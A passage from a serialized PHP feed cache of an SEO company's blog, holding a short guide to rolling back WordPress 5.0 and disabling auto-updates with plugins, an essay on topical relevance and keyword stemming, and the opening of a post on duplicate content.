href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-rollback-wordpress-5-0-a-just-in-case-you-werent-ready-guide/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:5878:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Ok, so, you&#8217;ve heard the chatter about this <a href=\"https://wordpress.org/plugins/gutenberg/\">Gutenberg thing</a> from WordPress for the last 6 months or so, and sometimes life just gets in the way and things can take you by surprise, but an WP update shouldn&#8217;t be one of them.</p>\n<p>So, just in case this happened to you, don&#8217;t panic, here&#8217;s a quick guide on how you can rollback WordPress with a few simple plugins and make all the headaches of broken themes and plugins go away&#8230;</p>\n<p>While this is just a temporary fix (as you can&#8217;t put off updating indefinitely) but this can give you and theme and plugin developers a chance to catch up and patch things to be more stable as any WP core update can potentially wreak havoc.</p>\n<p>Anyway, here&#8217;s a quick fix:</p></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/WP-Downgrade-Plugin.jpg\" class=\"image-module img-responsive img-center\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/WP-Downgrade-Plugin.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Step 1) Download the <strong>WP Downgrade Plugin</strong> &#8211; You can find it here &#8211; <a href=\"https://wordpress.org/plugins/wp-downgrade/\">https://wordpress.org/plugins/wp-downgrade/</a></p>\n<p>Step 2) <strong>Install and Activate the Plugin</strong> &gt; Then go to <strong>Settings</strong> &gt; <strong>WP-Downgrade</strong> &gt; then <strong>Enter the version you&#8217;d like to rollback to</strong> &gt; for example I used 4.9.8</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/wp-downgrade-settings-1024x386.jpg\" class=\"image-module img-responsive img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/wp-downgrade-settings-1024x386.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Step 3) <strong>Save changes</strong> and then <strong>click the link to upgrade your WP Core</strong>, then it should have the version you entered and successfully rollback changes (just like you&#8217;d update to a newer version from WP).</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/easy-updates-manager-plugin-1010x640.jpg\" class=\"image-module img-responsive rectangle img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/easy-updates-manager-plugin-1010x640.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">If you want to stop or disable auto-updates entirely, you can add this plugin from &#8211; <a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/\">https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/</a></p>\n<p>Just <strong>Download, Install and Activate Plugin</strong> &gt; Then go to <strong>Updates Options</strong> &gt; in sidebar &gt; right under updates &gt; Then click <strong>Disable Updates</strong> and <strong>Save Changes </strong>&gt;</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/disable-updates-option-1200x640.jpg\" class=\"image-module img-responsive rectangle img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/disable-updates-option-1200x640.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Problem solved.</p>\n<p>There&#8217;s also a plugin you can use if you just want to disable the Gutenberg editor and revert to the <a href=\"https://wordpress.org/plugins/classic-editor/\">WP classic editor</a> that you can learn about here &#8211; <a href=\"https://gogutenberg.com/disable-gutenberg/\">https://gogutenberg.com/disable-gutenberg/</a></p>\n<p>Enjoy!</p>\n<p>Jeffrey</p></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=mFkgcZIy4CM:279NYzft6Nw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/mFkgcZIy4CM\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:1;a:13:{s:5:\"title\";s:44:\"Topical Relevance, SEO and Keyword Stemming!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/5s6Rr3nWUss/\";s:8:\"category\";s:129:\"ArticlesKeyword Stemming and SEOSearch Engine Relevance ModelSEO and Contextual RelevanceSEO and Topical RelevanceUnique Keywords\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 19 May 2017 00:59:15 PDT\";s:4:\"guid\";s:91:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:11759:\"<p>For the purpose of <a href=\"http://www.seodesignsolutions.com/\"><span id=\"urn:enhancement-675cf1bc-12c8-b129-883d-07e8f9c370fb\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span></a>, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical <a href=\"http://seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> and (3) increase <span id=\"urn:enhancement-52755389-69c7-5844-fc7d-c3f9ada3c8f9\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/conversion_marketing\">conversion</span> by having a higher number of pages occupying a larger percentage of market share for <a href=\"http://seodesignsolutions.com/blog/seo-basics/using-related-search-to-find-googles-most-search-keywords/\">related keywords</a> and queries.</p>\n<div id=\"attachment_2549\" style=\"width: 435px\" class=\"wp-caption aligncenter\"><a href=\"http://seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\"><img class=\"size-full wp-image-2549\" title=\"keyword-stemming\" src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg\" alt=\"Create Topical Relevance for Keyword Stemming\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a><p class=\"wp-caption-text\">Create Topical Relevance for Keyword Stemming</p></div>\n<p>What degree of contextual extraction from <span id=\"urn:enhancement-5b65dde2-b5c2-290a-b2e9-3079555e88f8\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engine snippets contributes to ambient or unintentional <span id=\"urn:enhancement-40bd1a5b-b768-0d26-0bf8-19ea6fe9d678\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engine rankings? Considering that <strong>over 50% of keyword queries are unique</strong> and even <span id=\"urn:enhancement-2bd56aef-0865-56db-2e17-c05892a6ead7\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines have not seen them; information retrieval relies on <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/using-lsi-based-synonyms-for-on-page-semantic-relevance/\">contextual relevance</a> to determine a pages quality score determined by the domain authority.<span id=\"more-2553\"></span></p>\n<p><span id=\"urn:enhancement-b3f7226e-c6c5-778b-0c1f-2c5fc8eab9be\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_search_engine\">Search engine</span> optimization (<span id=\"urn:enhancement-f0f7cedc-6d10-eb93-077a-db5c67c8af55\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\"><a href=\"http://www.seodesignsolutions.com\">SEO</a></span>) involves fine tuning your pages for optimal performance in <span id=\"urn:enhancement-d214637f-6554-c500-8fa8-22e1827be56b\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines.  While many webmasters and <span id=\"urn:enhancement-1149af12-353c-0811-a736-415a7aea8933\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span>&#8216;s only focus on <strong>metrics you can measure</strong>, there is a holistic and alchemical element that occurs naturally over time when the value of each page blends and fuses to create topical islands of relevance. This topical relevance allows pages to rank for a plethora of key phrases unintentionally and deliver an array of traffic to fuel <span id=\"urn:enhancement-6143fbfa-ec02-278c-742a-4fd5c0ccce65\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/conversion_marketing\">conversion</span> for your website.</p>\n<p>There is a <strong>window of relevance</strong> that <span id=\"urn:enhancement-ad0c433f-d828-0783-3b84-b174987abafb\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines use to determine which content stays and which content goes. For example, pages from sites that have not been visited since 1997 without <span id=\"urn:enhancement-22e85bca-c455-d2d5-1bf8-e17241040c74\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/backlink\">inbound links</span>, references or any type of inference from peers (other sites) lack the necessary impact to remain a relevant result and are either minimized to <span id=\"urn:enhancement-e6079f90-a52a-b37a-552e-cfd0d04979af\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span> for 1-2 terms or are essentially pushed out of the index.</p>\n<p>On the contrary a new page from a trusted site or a new page from a site being linked to from other topical sites, social media sites, news aggregators, directories or editorially from various sources does have the needed ingredients to toggle the metrics necessary to be considered a relevant page and thus ensures its survival in the SERPs.</p>\n<p>Essentially, each page that crosses a <strong>relevance threshold</strong> for the on page and off page synergy starts to stem and rank for keywords found sparsely on that page. This translates into hit after hit for keyword that was not considered primary phrases for the page in question.</p>\n<p>This is typically referred to as <em>mid-tail to long-tail traffic</em>, however, this type of traffic can often exceed intentional (sought after) primary keywords consistently. In addition, using this aspect of how <span id=\"urn:enhancement-c790d089-46f9-d0ae-3ea8-bec8d436f2a6\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines scale relevance (before awarding a site a top <span id=\"urn:enhancement-8d571f11-be70-f9a8-44c1-4b8171b3df13\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span>) <a href=\"http://seodesignsolutions.com/blog/link-building/website-optimization-tips-for-link-building-and-seo/\">keyword stemming</a> should be utilized as a strategic advantage.</p>\n<p>Mapping out the most <a href=\"http://seodesignsolutions.com/blog/seo/seo-optimized/\">relevant shingles</a> to define your page to <span id=\"urn:enhancement-6e1d9ded-7819-36ab-f854-9d9057bfcd03\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines, then using accommodating anchor text (on page) within the site with internal links and reinforcing that with (off page) links from other sites with related topical reference (<span id=\"urn:enhancement-17b3569b-3e83-e307-f361-65dd904014b8\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/peer_review\">peer review</span>) creates authority for those keywords and key phrases.</p>\n<p>So, for those still trying to measure the <a href=\"http://seodesignsolutions.com/blog/seo-services/seo-pricing-why-seo-rates-cost-so-much/\"><span id=\"urn:enhancement-a8a160a9-67a7-a625-8b89-d410364fb8e6\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/return_on_investment\">ROI</span> of <span id=\"urn:enhancement-6eb552b2-cc90-eadc-d4e2-fc9291a05bee\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span></a> prematurely, the results are cumulative and essentially continue to overlap over time. The takeaway is, with the exceedingly high degree of click fraud occurring in <a href=\"http://seodesignsolutions.com/blog/internet-marketing/seo-ppc-advertising-branding-or-lead-generation/\"><span id=\"urn:enhancement-812a4ac3-0e71-9eff-5a40-e7e15ae7f600\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/pay_per_click\">PPC</span> </a>(up to 35% in some instances) taking control of how you communicate your pages purpose to <span id=\"urn:enhancement-04b30c8a-aeab-294a-634a-dcecedf33989\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines and how they evaluate your website (as a reference or authority) is an added benefit of <span id=\"urn:enhancement-070bf8a7-f77f-db88-c2b0-65cba254b692\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span>.</p>\n<p>For every keyword you target with purpose, 10 more are also pulled into the spotlight (which you can use to stem and pull up multiple related pages within your website into the top 10 results).</p>\n<p>What is <strong>the value of a top 10 <span id=\"urn:enhancement-ee37e751-aa90-687e-2a2d-0e57ae221939\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span></strong> you might ask? That all depends on how trafficked the keyword or the topic are. However, aside from <span id=\"urn:enhancement-ea9cc3e7-924d-275d-2da0-00e2152967fd\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_traffic\">visitors</span> typing in keywords and searching for those pages, <span id=\"urn:enhancement-b0d09fa5-55c7-0000-fc40-582268403e31\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines can evaluate when your content has passed the contextual point of relevance and will essentially return those pages as relevant results (when someone searches).</p>\n<p>With this in mind, you can target the low hanging fruit of today to capture the most competitive keywords in the long-run and create a pure win/win relevance model for your website.</p>\n<p>Viewing <span id=\"urn:enhancement-ad242e3d-4501-7a41-ce02-f1d0206c9ac0\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span> from this standpoint, you can reap the immediate short-term benefits of rankings funneling <span id=\"urn:enhancement-36b6f0ba-909a-b78e-de18-a6c125a7a9e8\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_traffic\">visitors</span> to landing pages or take the approach of devouring market share so that &#8220;just in case&#8221; prospects <span id=\"urn:enhancement-b188756f-3abf-6432-0411-0d8e0935b559\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> for a particular topic; your website is there at the helm of all things related.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5s6Rr3nWUss:_yZ1XJfU3L8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5s6Rr3nWUss\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:487:\"For the purpose of SEO, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical domain authority and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for related keywords and queries. Create Topical Relevance <a href=\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:96:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"28\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:91:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\";}s:7:\"summary\";s:487:\"For the purpose of SEO, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical domain authority and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for related keywords and queries. Create Topical Relevance <a href=\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:11759:\"<p>For the purpose of <a href=\"http://www.seodesignsolutions.com/\"><span id=\"urn:enhancement-675cf1bc-12c8-b129-883d-07e8f9c370fb\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span></a>, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical <a href=\"http://seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> and (3) increase <span id=\"urn:enhancement-52755389-69c7-5844-fc7d-c3f9ada3c8f9\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/conversion_marketing\">conversion</span> by having a higher number of pages occupying a larger percentage of market share for <a href=\"http://seodesignsolutions.com/blog/seo-basics/using-related-search-to-find-googles-most-search-keywords/\">related keywords</a> and queries.</p>\n<div id=\"attachment_2549\" style=\"width: 435px\" class=\"wp-caption aligncenter\"><a href=\"http://seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\"><img class=\"size-full wp-image-2549\" title=\"keyword-stemming\" src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg\" alt=\"Create Topical Relevance for Keyword Stemming\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a><p class=\"wp-caption-text\">Create Topical Relevance for Keyword Stemming</p></div>\n<p>What degree of contextual extraction from <span id=\"urn:enhancement-5b65dde2-b5c2-290a-b2e9-3079555e88f8\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engine snippets contributes to ambient or unintentional <span id=\"urn:enhancement-40bd1a5b-b768-0d26-0bf8-19ea6fe9d678\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engine rankings? Considering that <strong>over 50% of keyword queries are unique</strong> and even <span id=\"urn:enhancement-2bd56aef-0865-56db-2e17-c05892a6ead7\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines have not seen them; information retrieval relies on <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/using-lsi-based-synonyms-for-on-page-semantic-relevance/\">contextual relevance</a> to determine a pages quality score determined by the domain authority.<span id=\"more-2553\"></span></p>\n<p><span id=\"urn:enhancement-b3f7226e-c6c5-778b-0c1f-2c5fc8eab9be\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_search_engine\">Search engine</span> optimization (<span id=\"urn:enhancement-f0f7cedc-6d10-eb93-077a-db5c67c8af55\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\"><a href=\"http://www.seodesignsolutions.com\">SEO</a></span>) involves fine tuning your pages for optimal performance in <span id=\"urn:enhancement-d214637f-6554-c500-8fa8-22e1827be56b\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines.  While many webmasters and <span id=\"urn:enhancement-1149af12-353c-0811-a736-415a7aea8933\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span>&#8216;s only focus on <strong>metrics you can measure</strong>, there is a holistic and alchemical element that occurs naturally over time when the value of each page blends and fuses to create topical islands of relevance. This topical relevance allows pages to rank for a plethora of key phrases unintentionally and deliver an array of traffic to fuel <span id=\"urn:enhancement-6143fbfa-ec02-278c-742a-4fd5c0ccce65\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/conversion_marketing\">conversion</span> for your website.</p>\n<p>There is a <strong>window of relevance</strong> that <span id=\"urn:enhancement-ad0c433f-d828-0783-3b84-b174987abafb\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines use to determine which content stays and which content goes. For example, pages from sites that have not been visited since 1997 without <span id=\"urn:enhancement-22e85bca-c455-d2d5-1bf8-e17241040c74\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/backlink\">inbound links</span>, references or any type of inference from peers (other sites) lack the necessary impact to remain a relevant result and are either minimized to <span id=\"urn:enhancement-e6079f90-a52a-b37a-552e-cfd0d04979af\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span> for 1-2 terms or are essentially pushed out of the index.</p>\n<p>On the contrary a new page from a trusted site or a new page from a site being linked to from other topical sites, social media sites, news aggregators, directories or editorially from various sources does have the needed ingredients to toggle the metrics necessary to be considered a relevant page and thus ensures its survival in the SERPs.</p>\n<p>Essentially, each page that crosses a <strong>relevance threshold</strong> for the on page and off page synergy starts to stem and rank for keywords found sparsely on that page. This translates into hit after hit for keyword that was not considered primary phrases for the page in question.</p>\n<p>This is typically referred to as <em>mid-tail to long-tail traffic</em>, however, this type of traffic can often exceed intentional (sought after) primary keywords consistently. In addition, using this aspect of how <span id=\"urn:enhancement-c790d089-46f9-d0ae-3ea8-bec8d436f2a6\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines scale relevance (before awarding a site a top <span id=\"urn:enhancement-8d571f11-be70-f9a8-44c1-4b8171b3df13\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span>) <a href=\"http://seodesignsolutions.com/blog/link-building/website-optimization-tips-for-link-building-and-seo/\">keyword stemming</a> should be utilized as a strategic advantage.</p>\n<p>Mapping out the most <a href=\"http://seodesignsolutions.com/blog/seo/seo-optimized/\">relevant shingles</a> to define your page to <span id=\"urn:enhancement-6e1d9ded-7819-36ab-f854-9d9057bfcd03\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines, then using accommodating anchor text (on page) within the site with internal links and reinforcing that with (off page) links from other sites with related topical reference (<span id=\"urn:enhancement-17b3569b-3e83-e307-f361-65dd904014b8\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/peer_review\">peer review</span>) creates authority for those keywords and key phrases.</p>\n<p>So, for those still trying to measure the <a href=\"http://seodesignsolutions.com/blog/seo-services/seo-pricing-why-seo-rates-cost-so-much/\"><span id=\"urn:enhancement-a8a160a9-67a7-a625-8b89-d410364fb8e6\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/return_on_investment\">ROI</span> of <span id=\"urn:enhancement-6eb552b2-cc90-eadc-d4e2-fc9291a05bee\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span></a> prematurely, the results are cumulative and essentially continue to overlap over time. The takeaway is, with the exceedingly high degree of click fraud occurring in <a href=\"http://seodesignsolutions.com/blog/internet-marketing/seo-ppc-advertising-branding-or-lead-generation/\"><span id=\"urn:enhancement-812a4ac3-0e71-9eff-5a40-e7e15ae7f600\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/pay_per_click\">PPC</span> </a>(up to 35% in some instances) taking control of how you communicate your pages purpose to <span id=\"urn:enhancement-04b30c8a-aeab-294a-634a-dcecedf33989\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines and how they evaluate your website (as a reference or authority) is an added benefit of <span id=\"urn:enhancement-070bf8a7-f77f-db88-c2b0-65cba254b692\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span>.</p>\n<p>For every keyword you target with purpose, 10 more are also pulled into the spotlight (which you can use to stem and pull up multiple related pages within your website into the top 10 results).</p>\n<p>What is <strong>the value of a top 10 <span id=\"urn:enhancement-ee37e751-aa90-687e-2a2d-0e57ae221939\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/ranking\">ranking</span></strong> you might ask? That all depends on how trafficked the keyword or the topic are. However, aside from <span id=\"urn:enhancement-ea9cc3e7-924d-275d-2da0-00e2152967fd\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_traffic\">visitors</span> typing in keywords and searching for those pages, <span id=\"urn:enhancement-b0d09fa5-55c7-0000-fc40-582268403e31\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> engines can evaluate when your content has passed the contextual point of relevance and will essentially return those pages as relevant results (when someone searches).</p>\n<p>With this in mind, you can target the low hanging fruit of today to capture the most competitive keywords in the long-run and create a pure win/win relevance model for your website.</p>\n<p>Viewing <span id=\"urn:enhancement-ad242e3d-4501-7a41-ce02-f1d0206c9ac0\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_optimization\">SEO</span> from this standpoint, you can reap the immediate short-term benefits of rankings funneling <span id=\"urn:enhancement-36b6f0ba-909a-b78e-de18-a6c125a7a9e8\" class=\"textannotation disambiguated wl-thing\" itemid=\"http://data.wordlift.it/wl068/entity/web_traffic\">visitors</span> to landing pages or take the approach of devouring market share so that &#8220;just in case&#8221; prospects <span id=\"urn:enhancement-b188756f-3abf-6432-0411-0d8e0935b559\" class=\"textannotation disambiguated wl-thing wl-no-link\" itemid=\"http://data.wordlift.it/wl068/entity/search_engine_technology\">search</span> for a particular topic; your website is there at the helm of all things related.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5s6Rr3nWUss:_yZ1XJfU3L8:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5s6Rr3nWUss\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:2;a:13:{s:5:\"title\";s:49:\"Block Segmentation, Duplicate Content, SEO and IR\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/5cAozBpoIes/\";s:8:\"category\";s:156:\"SEO ResourcesAvoid Duplication Across BlocksSearch Engine Context and DuplicationSEOSEO and Block SegmentationSEO and IRSEO Term Frequency and Co occurrence\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sun, 14 May 2017 06:55:18 PDT\";s:4:\"guid\";s:79:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:6111:\"<p>Often you hear about the need to prevent duplicate content within your own website as it applies to <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters.</p>\n<p><a 